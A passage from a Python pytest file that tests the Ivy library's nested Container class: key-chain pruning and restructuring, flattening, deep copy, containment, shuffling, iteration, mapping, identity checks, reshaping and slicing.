assert "Eee" not in container_pruned
# containing
container_pruned = container.prune_keys_from_key_chains(containing=["B", "E"])
assert np.allclose(ivy.to_numpy(container_pruned["Ayy"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ayy), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned["Cee"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.Cee), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned["Dee"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.Dee), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned["Fff"]), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_pruned.Fff), np.array([[4]]))
assert "Bee" not in container_pruned
assert "Eee" not in container_pruned
def test_container_restructure_key_chains(device, call):
# single
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_restructured = container.restructure_key_chains({"a": "A"})
assert np.allclose(ivy.to_numpy(container_restructured["A"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_restructured.A), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_restructured["b/c"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_restructured.b.c), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_restructured["b/d"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_restructured.b.d), np.array([[3]]))
# full
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_restructured = container.restructure_key_chains(
{"a": "A", "b/c": "B/C", "b/d": "B/D"}
)
assert np.allclose(ivy.to_numpy(container_restructured["A"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_restructured.A), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_restructured["B/C"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_restructured.B.C), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_restructured["B/D"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_restructured.B.D), np.array([[3]]))
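# restructure renames each key chain and reshapes its array according to an
# einops-style pattern (with optional axes_lengths); keep_orig=False drops the
# original entries from the result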
def test_container_restructure(device, call):
container = Container(
{
"a": ivy.array([[1, 2], [3, 4]], device=device),
"b": {
"c": ivy.array([[2, 4], [6, 8]], device=device),
"d": ivy.array([3, 6, 9, 12], device=device),
},
}
)
container_restructured = container.restructure(
{
"a": {"key_chain": "A", "pattern": "a b -> b a"},
"b/c": {"key_chain": "B/C", "pattern": "a b -> (a b)"},
"b/d": {
"key_chain": "B/D",
"pattern": "(a b) -> a b",
"axes_lengths": {"a": 2, "b": 2},
},
},
keep_orig=False,
)
assert np.allclose(
ivy.to_numpy(container_restructured["A"]), np.array([[1, 3], [2, 4]])
)
assert np.allclose(
ivy.to_numpy(container_restructured.A), np.array([[1, 3], [2, 4]])
)
assert np.allclose(
ivy.to_numpy(container_restructured["B/C"]), np.array([2, 4, 6, 8])
)
assert np.allclose(ivy.to_numpy(container_restructured.B.C), np.array([2, 4, 6, 8]))
assert np.allclose(
ivy.to_numpy(container_restructured["B/D"]), np.array([[3, 6], [9, 12]])
)
assert np.allclose(
ivy.to_numpy(container_restructured.B.D), np.array([[3, 6], [9, 12]])
)
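# flatten_key_chains joins nested keys with "__"; above_height and below_depth
# limit the flattening to levels above the given height or below the given depth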
def test_container_flatten_key_chains(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": {"d": ivy.array([2], device=device)},
"e": {"f": {"g": ivy.array([3], device=device)}},
},
}
)
# full
container_flat = container.flatten_key_chains()
assert np.allclose(ivy.to_numpy(container_flat["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat["b__c__d"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat.b__c__d), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat["b__e__f__g"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_flat.b__e__f__g), np.array([[3]]))
# above height 1
container_flat = container.flatten_key_chains(above_height=1)
assert np.allclose(ivy.to_numpy(container_flat["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat["b__c"]["d"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat.b__c.d), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat["b__e__f"]["g"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_flat.b__e__f.g), np.array([[3]]))
# below depth 1
container_flat = container.flatten_key_chains(below_depth=1)
assert np.allclose(ivy.to_numpy(container_flat["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat["b"]["c__d"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat.b.c__d), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat["b"]["e__f__g"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_flat.b.e__f__g), np.array([[3]]))
# above height 1, below depth 1
container_flat = container.flatten_key_chains(above_height=1, below_depth=1)
assert np.allclose(ivy.to_numpy(container_flat["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat["b"]["c"]["d"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat.b.c.d), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat["b"]["e__f"]["g"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_flat.b.e__f.g), np.array([[3]]))
def test_container_deep_copy(device, call):
dict_in = {
"a": ivy.array([0.0], device=device),
"b": {
"c": ivy.array([1.0], device=device),
"d": ivy.array([2.0], device=device),
},
}
cont = Container(dict_in)
cont_deepcopy = cont.deep_copy()
assert np.allclose(ivy.to_numpy(cont.a), ivy.to_numpy(cont_deepcopy.a))
assert np.allclose(ivy.to_numpy(cont.b.c), ivy.to_numpy(cont_deepcopy.b.c))
assert np.allclose(ivy.to_numpy(cont.b.d), ivy.to_numpy(cont_deepcopy.b.d))
assert id(cont.a) != id(cont_deepcopy.a)
assert id(cont.b.c) != id(cont_deepcopy.b.c)
assert id(cont.b.d) != id(cont_deepcopy.b.d)
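# __contains__ accepts keys, key chains and sub-containers; contains_sub_container
# compares values, whereas contains_sub_structure only compares the nested key layout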
def test_container_contains(device, call):
arr0 = ivy.array([0.0], device=device)
arr1 = ivy.array([1.0], device=device)
arr2 = ivy.array([2.0], device=device)
sub_cont = Container({"c": arr1, "d": arr2})
container = Container({"a": arr0, "b": sub_cont})
# keys
assert "a" in container
assert "b" in container
assert "c" not in container
assert "b/c" in container
assert "d" not in container
assert "b/d" in container
# sub-container
assert container.contains_sub_container(container)
assert container.contains_sub_container(sub_cont)
assert sub_cont in container
# partial sub-container
partial_sub_cont = Container({"b": {"d": arr2}})
assert container.contains_sub_container(container, partial=True)
assert container.contains_sub_container(partial_sub_cont, partial=True)
assert not partial_sub_cont.contains_sub_container(container, partial=True)
# sub-structure
sub_struc = Container(
{"c": ivy.array([3.0], device=device), "d": ivy.array([4.0], device=device)}
)
assert not container.contains_sub_container(sub_struc)
assert sub_struc not in container
assert container.contains_sub_structure(sub_struc)
assert container.contains_sub_structure(container)
# partial sub-structure
partial_sub_struc = Container({"b": {"d": ivy.array([4.0], device=device)}})
assert container.contains_sub_structure(container, partial=True)
assert container.contains_sub_structure(partial_sub_struc, partial=True)
assert not partial_sub_struc.contains_sub_structure(container, partial=True)
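# shuffle applies the same seeded permutation to every applied leaf, so entries
# under different keys remain aligned after shuffling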
def test_container_shuffle(device, call):
if call is helpers.tf_graph_call:
        # tf.random.set_seed is not compiled, so the shuffle would not be
        # aligned between container items.
pytest.skip()
dict_in = {
"a": ivy.array([1, 2, 3], device=device),
"b": {
"c": ivy.array([1, 2, 3], device=device),
"d": ivy.array([1, 2, 3], device=device),
},
}
container = Container(dict_in)
# without key_chains specification
container_shuffled = container.shuffle(0)
data = ivy.array([1, 2, 3], device=device)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled["a"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"]["c"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"]["d"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.d) == shuffled_data).all()
# with key_chains to apply
container_shuffled = container.shuffle(0, ["a", "b/c"])
data = ivy.array([1, 2, 3], device=device)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled["a"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"]["c"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"]["d"]) == ivy.to_numpy(data)).all()
assert (ivy.to_numpy(container_shuffled.b.d) == ivy.to_numpy(data)).all()
# with key_chains to apply pruned
container_shuffled = container.shuffle(0, ["a", "b/c"], prune_unapplied=True)
data = ivy.array([1, 2, 3], device=device)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled["a"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"]["c"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert "b/d" not in container_shuffled
    # with key_chains to not apply
container_shuffled = container.shuffle(
0, Container({"a": None, "b": {"d": None}}), to_apply=False
)
data = ivy.array([1, 2, 3], device=device)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled["a"]) == ivy.to_numpy(data)).all()
assert (ivy.to_numpy(container_shuffled.a) == ivy.to_numpy(data)).all()
assert (ivy.to_numpy(container_shuffled["b"]["c"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"]["d"]) == ivy.to_numpy(data)).all()
assert (ivy.to_numpy(container_shuffled.b.d) == ivy.to_numpy(data)).all()
# with key_chains to not apply pruned
container_shuffled = container.shuffle(
0,
Container({"a": None, "b": {"d": None}}),
to_apply=False,
prune_unapplied=True,
)
data = ivy.array([1, 2, 3], device=device)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert "a" not in container_shuffled
assert (ivy.to_numpy(container_shuffled["b"]["c"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert "b/d" not in container_shuffled
# map sequences
dict_in = {
"a": ivy.array([1, 2, 3], device=device),
"b": [ivy.array([1, 2, 3], device=device), ivy.array([1, 2, 3], device=device)],
}
container = Container(dict_in)
container_shuffled = container.shuffle(0, map_sequences=True)
data = ivy.array([1, 2, 3], device=device)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled["a"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"][0]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b[0]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"][1]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b[1]) == shuffled_data).all()
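# to_iterator yields (key_chain, value) pairs depth-first; with include_empty=True,
# empty sub-containers are also yielded as leaf values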
@pytest.mark.parametrize("include_empty", [True, False])
def test_container_to_iterator(include_empty, device, call):
a_val = Container() if include_empty else ivy.array([1], device=device)
bc_val = Container() if include_empty else ivy.array([2], device=device)
bd_val = Container() if include_empty else ivy.array([3], device=device)
dict_in = {"a": a_val, "b": {"c": bc_val, "d": bd_val}}
container = Container(dict_in)
# with key chains
container_iterator = container.to_iterator(include_empty=include_empty)
for (key_chain, value), expected in zip(
container_iterator, [("a", a_val), ("b/c", bc_val), ("b/d", bd_val)]
):
expected_key_chain = expected[0]
expected_value = expected[1]
assert key_chain == expected_key_chain
assert value is expected_value
# with leaf keys
container_iterator = container.to_iterator(
leaf_keys_only=True, include_empty=include_empty
)
for (key_chain, value), expected in zip(
container_iterator, [("a", a_val), ("c", bc_val), ("d", bd_val)]
):
expected_key_chain = expected[0]
expected_value = expected[1]
assert key_chain == expected_key_chain
assert value is expected_value
@pytest.mark.parametrize("include_empty", [True, False])
def test_container_to_iterator_values(include_empty, device, call):
a_val = Container() if include_empty else ivy.array([1], device=device)
bc_val = Container() if include_empty else ivy.array([2], device=device)
bd_val = Container() if include_empty else ivy.array([3], device=device)
dict_in = {"a": a_val, "b": {"c": bc_val, "d": bd_val}}
container = Container(dict_in)
    # iterate over the leaf values only
container_iterator = container.to_iterator_values(include_empty=include_empty)
for value, expected_value in zip(container_iterator, [a_val, bc_val, bd_val]):
assert value is expected_value
@pytest.mark.parametrize("include_empty", [True, False])
def test_container_to_iterator_keys(include_empty, device, call):
a_val = Container() if include_empty else ivy.array([1], device=device)
bc_val = Container() if include_empty else ivy.array([2], device=device)
bd_val = Container() if include_empty else ivy.array([3], device=device)
dict_in = {"a": a_val, "b": {"c": bc_val, "d": bd_val}}
container = Container(dict_in)
# with key chains
container_iterator = container.to_iterator_keys(include_empty=include_empty)
for key_chain, expected_key_chain in zip(container_iterator, ["a", "b/c", "b/d"]):
assert key_chain == expected_key_chain
# with leaf keys
container_iterator = container.to_iterator_keys(
leaf_keys_only=True, include_empty=include_empty
)
for key, expected_key in zip(container_iterator, ["a", "c", "d"]):
assert key == expected_key
def test_container_to_flat_list(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
container_flat_list = container.to_flat_list()
for value, expected_value in zip(
container_flat_list,
[
ivy.array([1], device=device),
ivy.array([2], device=device),
ivy.array([3], device=device),
],
):
assert value == expected_value
def test_container_from_flat_list(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
flat_list = [4, 5, 6]
container = container.from_flat_list(flat_list)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([4]))
assert np.allclose(ivy.to_numpy(container.a), np.array([4]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([6]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([6]))
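# map applies the function to every leaf; with inplace=True the original container
# is mutated in place, so pruning of unapplied keys is only verified for the
# out-of-place case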
@pytest.mark.parametrize("inplace", [True, False])
def test_container_map(inplace, device, call):
# without key_chains specification
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container_orig = Container(dict_in)
container = container_orig.deep_copy()
container_mapped = container.map(lambda x, _: x + 1, inplace=inplace)
if inplace:
container_iterator = container.to_iterator()
else:
container_iterator = container_mapped.to_iterator()
for (key, value), expected_value in zip(
container_iterator,
[
ivy.array([2], device=device),
ivy.array([3], device=device),
ivy.array([4], device=device),
],
):
assert call(lambda x: x, value) == call(lambda x: x, expected_value)
# with key_chains to apply
container = container_orig.deep_copy()
container_mapped = container.map(lambda x, _: x + 1, ["a", "b/c"], inplace=inplace)
if inplace:
container_mapped = container
assert np.allclose(ivy.to_numpy(container_mapped["a"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_mapped.a), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_mapped["b"]["c"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped["b"]["d"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.d), np.array([[3]]))
# with key_chains to apply pruned
container = container_orig.deep_copy()
container_mapped = container.map(
lambda x, _: x + 1, ["a", "b/c"], prune_unapplied=True, inplace=inplace
)
if inplace:
container_mapped = container
assert np.allclose(ivy.to_numpy(container_mapped["a"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_mapped.a), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_mapped["b"]["c"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
if not inplace:
assert "b/d" not in container_mapped
# with key_chains to not apply
container = container_orig.deep_copy()
container_mapped = container.map(
lambda x, _: x + 1,
Container({"a": None, "b": {"d": None}}),
to_apply=False,
inplace=inplace,
)
if inplace:
container_mapped = container
assert np.allclose(ivy.to_numpy(container_mapped["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_mapped.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_mapped["b"]["c"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped["b"]["d"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.d), np.array([[3]]))
# with key_chains to not apply pruned
container = container_orig.deep_copy()
container_mapped = container.map(
lambda x, _: x + 1,
Container({"a": None, "b": {"d": None}}),
to_apply=False,
prune_unapplied=True,
inplace=inplace,
)
if inplace:
container_mapped = container
if not inplace:
assert "a" not in container_mapped
assert np.allclose(ivy.to_numpy(container_mapped["b"]["c"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
if not inplace:
assert "b/d" not in container_mapped
# with sequences
container_orig = Container(
{
"a": ivy.array([1], device=device),
"b": [ivy.array([2], device=device), ivy.array([3], device=device)],
}
)
container = container_orig.deep_copy()
container_mapped = container.map(
lambda x, _: x + 1, inplace=inplace, map_sequences=True
)
if inplace:
container_mapped = container
assert np.allclose(ivy.to_numpy(container_mapped["a"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_mapped["b"][0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_mapped["b"][1]), np.array([4]))
@pytest.mark.parametrize("inplace", [True, False])
def test_container_map_conts(inplace, device, call):
# without key_chains specification
container_orig = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
def _add_e_attr(cont_in):
cont_in.e = ivy.array([4], device=device)
return cont_in
# with self
container = container_orig.deep_copy()
container_mapped = container.map_conts(lambda c, _: _add_e_attr(c), inplace=inplace)
if inplace:
container_mapped = container
assert "e" in container_mapped
assert np.array_equal(ivy.to_numpy(container_mapped.e), np.array([4]))
assert "e" in container_mapped.b
assert np.array_equal(ivy.to_numpy(container_mapped.b.e), np.array([4]))
# without self
container = container_orig.deep_copy()
container_mapped = container.map_conts(
lambda c, _: _add_e_attr(c), include_self=False, inplace=inplace
)
if inplace:
container_mapped = container
assert "e" not in container_mapped
assert "e" in container_mapped.b
assert np.array_equal(ivy.to_numpy(container_mapped.b.e), np.array([4]))
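# multi_map calls the function with the list of corresponding leaves taken from
# each container in turn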
def test_container_multi_map(device, call):
# without key_chains specification
container0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container1 = Container(
{
"a": ivy.array([3], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([5], device=device),
},
}
)
    # sum the corresponding leaves of the two containers
container_mapped = ivy.Container.multi_map(
lambda x, _: x[0] + x[1], [container0, container1]
)
assert np.allclose(ivy.to_numpy(container_mapped["a"]), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_mapped.a), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_mapped["b"]["c"]), np.array([[6]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[6]]))
assert np.allclose(ivy.to_numpy(container_mapped["b"]["d"]), np.array([[8]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.d), np.array([[8]]))
def test_container_common_key_chains(device, call):
arr1 = ivy.array([1], device=device)
arr2 = ivy.array([2], device=device)
arr3 = ivy.array([3], device=device)
cont0 = Container({"a": arr1, "b": {"c": arr2, "d": arr3}})
cont1 = Container({"b": {"c": arr2, "d": arr3, "e": arr1}})
cont2 = Container({"a": arr1, "b": {"d": arr3, "e": arr1}})
# 0
common_kcs = Container.common_key_chains([cont0])
assert len(common_kcs) == 3
assert "a" in common_kcs
assert "b/c" in common_kcs
assert "b/d" in common_kcs
# 0-1
common_kcs = Container.common_key_chains([cont0, cont1])
assert len(common_kcs) == 2
assert "b/c" in common_kcs
assert "b/d" in common_kcs
# 0-2
common_kcs = Container.common_key_chains([cont0, cont2])
assert len(common_kcs) == 2
assert "a" in common_kcs
assert "b/d" in common_kcs
# 1-2
common_kcs = Container.common_key_chains([cont1, cont2])
assert len(common_kcs) == 2
assert "b/d" in common_kcs
assert "b/e" in common_kcs
# all
common_kcs = Container.common_key_chains([cont0, cont1, cont2])
assert len(common_kcs) == 1
assert "b/d" in common_kcs
def test_container_identical(device, call):
# without key_chains specification
arr1 = ivy.array([1], device=device)
arr2 = ivy.array([2], device=device)
arr3 = ivy.array([3], device=device)
container0 = Container({"a": arr1, "b": {"c": arr2, "d": arr3}})
container1 = Container({"a": arr1, "b": {"c": arr2, "d": arr3}})
container2 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container3 = Container({"b": {"d": arr3}})
container4 = Container({"d": arr3})
# the same
assert ivy.Container.identical([container0, container1])
assert ivy.Container.identical([container1, container0])
# not the same
assert not ivy.Container.identical([container0, container2])
assert not ivy.Container.identical([container2, container0])
assert not ivy.Container.identical([container1, container2])
assert not ivy.Container.identical([container2, container1])
# partial
assert ivy.Container.identical([container0, container3], partial=True)
assert ivy.Container.identical([container3, container0], partial=True)
assert not ivy.Container.identical([container0, container4], partial=True)
assert not ivy.Container.identical([container4, container0], partial=True)
def test_container_identical_structure(device, call):
# without key_chains specification
container0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container1 = Container(
{
"a": ivy.array([3], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([5], device=device),
},
}
)
container2 = Container(
{
"a": ivy.array([3], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([5], device=device),
"e": ivy.array([6], device=device),
},
}
)
container3 = Container(
{
"a": ivy.array([3], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([5], device=device),
},
"e": ivy.array([6], device=device),
}
)
container4 = Container({"b": {"d": ivy.array([4], device=device)}})
container5 = Container({"d": ivy.array([4], device=device)})
# with identical
assert ivy.Container.identical_structure([container0, container1])
assert ivy.Container.identical_structure([container1, container0])
assert ivy.Container.identical_structure([container1, container0, container1])
# without identical
assert not ivy.Container.identical_structure([container2, container3])
assert not ivy.Container.identical_structure([container0, container3])
assert not ivy.Container.identical_structure([container1, container2])
assert not ivy.Container.identical_structure([container1, container0, container2])
# partial
assert ivy.Container.identical_structure([container0, container4], partial=True)
assert ivy.Container.identical_structure([container1, container4], partial=True)
assert ivy.Container.identical_structure([container2, container4], partial=True)
assert ivy.Container.identical_structure([container3, container4], partial=True)
assert ivy.Container.identical_structure([container4, container4], partial=True)
assert not ivy.Container.identical_structure([container0, container5], partial=True)
assert not ivy.Container.identical_structure([container1, container5], partial=True)
assert not ivy.Container.identical_structure([container2, container5], partial=True)
assert not ivy.Container.identical_structure([container3, container5], partial=True)
assert not ivy.Container.identical_structure([container4, container5], partial=True)
def test_container_identical_configs(device, call):
container0 = Container({"a": ivy.array([1], device=device)}, print_limit=5)
container1 = Container({"a": ivy.array([1], device=device)}, print_limit=5)
container2 = Container({"a": ivy.array([1], device=device)}, print_limit=10)
# with identical
assert ivy.Container.identical_configs([container0, container1])
assert ivy.Container.identical_configs([container1, container0])
assert ivy.Container.identical_configs([container1, container0, container1])
# without identical
assert not ivy.Container.identical_configs([container1, container2])
assert not ivy.Container.identical_configs([container1, container0, container2])
def test_container_identical_array_shapes(device, call):
# without key_chains specification
container0 = Container(
{
"a": ivy.array([1, 2], device=device),
"b": {
"c": ivy.array([2, 3, 4], device=device),
"d": ivy.array([3, 4, 5, 6], device=device),
},
}
)
container1 = Container(
{
"a": ivy.array([1, 2, 3, 4], device=device),
"b": {
"c": ivy.array([3, 4], device=device),
"d": ivy.array([3, 4, 5], device=device),
},
}
)
container2 = Container(
{
"a": ivy.array([1, 2, 3, 4], device=device),
"b": {
"c": ivy.array([3, 4], device=device),
"d": ivy.array([3, 4, 5, 6], device=device),
},
}
)
# with identical
assert ivy.Container.identical_array_shapes([container0, container1])
assert ivy.Container.identical_array_shapes([container1, container0])
assert ivy.Container.identical_array_shapes([container1, container0, container1])
    # without identical
    assert not ivy.Container.identical_array_shapes([container0, container2])
    assert not ivy.Container.identical_array_shapes([container1, container2])
    assert not ivy.Container.identical_array_shapes(
        [container0, container1, container2]
    )
def test_container_dtype(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2.0], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
dtype_container = container.dtype()
for (key, value), expected_value in zip(
dtype_container.to_iterator(),
[
ivy.array([1], device=device).dtype,
ivy.array([2.0], device=device).dtype,
ivy.array([3], device=device).dtype,
],
):
assert value == expected_value
def test_container_with_entries_as_lists(device, call):
if call in [helpers.tf_graph_call]:
# to_list() requires eager execution
pytest.skip()
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2.0], device=device), "d": "some string"},
}
container = Container(dict_in)
container_w_list_entries = container.with_entries_as_lists()
for (key, value), expected_value in zip(
container_w_list_entries.to_iterator(), [[1], [2.0], "some string"]
):
assert value == expected_value
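# reshape_like reshapes each leaf to the shape stored under the matching key of
# new_shapes; leading_shape prepends extra leading (e.g. batch) dimensions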
def test_container_reshape_like(device, call):
container = Container(
{
"a": ivy.array([[1.0]], device=device),
"b": {
"c": ivy.array([[3.0], [4.0]], device=device),
"d": ivy.array([[5.0], [6.0], [7.0]], device=device),
},
}
)
new_shapes = Container({"a": (1,), "b": {"c": (1, 2, 1), "d": (3, 1, 1)}})
# without leading shape
container_reshaped = container.reshape_like(new_shapes)
assert list(container_reshaped["a"].shape) == [1]
assert list(container_reshaped.a.shape) == [1]
assert list(container_reshaped["b"]["c"].shape) == [1, 2, 1]
assert list(container_reshaped.b.c.shape) == [1, 2, 1]
assert list(container_reshaped["b"]["d"].shape) == [3, 1, 1]
assert list(container_reshaped.b.d.shape) == [3, 1, 1]
# with leading shape
container = Container(
{
"a": ivy.array([[[1.0]], [[1.0]], [[1.0]]], device=device),
"b": {
"c": ivy.array(
[[[3.0], [4.0]], [[3.0], [4.0]], [[3.0], [4.0]]], device=device
),
"d": ivy.array(
[
[[5.0], [6.0], [7.0]],
[[5.0], [6.0], [7.0]],
[[5.0], [6.0], [7.0]],
],
device=device,
),
},
}
)
container_reshaped = container.reshape_like(new_shapes, leading_shape=[3])
assert list(container_reshaped["a"].shape) == [3, 1]
assert list(container_reshaped.a.shape) == [3, 1]
assert list(container_reshaped["b"]["c"].shape) == [3, 1, 2, 1]
assert list(container_reshaped.b.c.shape) == [3, 1, 2, 1]
assert list(container_reshaped["b"]["d"].shape) == [3, 3, 1, 1]
assert list(container_reshaped.b.d.shape) == [3, 3, 1, 1]
def test_container_slice(device, call):
dict_in = {
"a": ivy.array([[0.0], [1.0]], device=device),
"b": {
"c": ivy.array([[1.0], [2.0]], device=device),
"d": ivy.array([[2.0], [3.0]], device=device),
},
}
container = Container(dict_in)
container0 = container[0]
container1 = container[1]
assert np.array_equal(ivy.to_numpy(container0["a"]), np.array([0.0]))
assert np.array_equal(ivy.to_numpy(container0.a), np.array([0.0]))
assert np.array_equal(ivy.to_numpy(container0["b"]["c"]), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(container0.b.c), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(container0["b"]["d"]), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(container0.b.d), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(container1["a"]), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(container1.a), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(container1["b"]["c"]), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(container1.b.c), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(container1["b"]["d"]), np.array([3.0]))
assert np.array_equal(ivy.to_numpy(container1.b.d), np.array([3.0]))
def test_container_slice_via_key(device, call):
dict_in = {
"a": {
"x": ivy.array([0.0], device=device),
"y": ivy.array([1.0], device=device),
},
"b": {
"c": {
"x": ivy.array([1.0], device=device),
"y": ivy.array([2.0], device=device),
},
"d": {
"x": ivy.array([2.0], device=device),
"y": ivy.array([3.0], device=device),
},
},
}
container = Container(dict_in)
containerx = container.slice_via_key("x")
containery = container.slice_via_key("y")
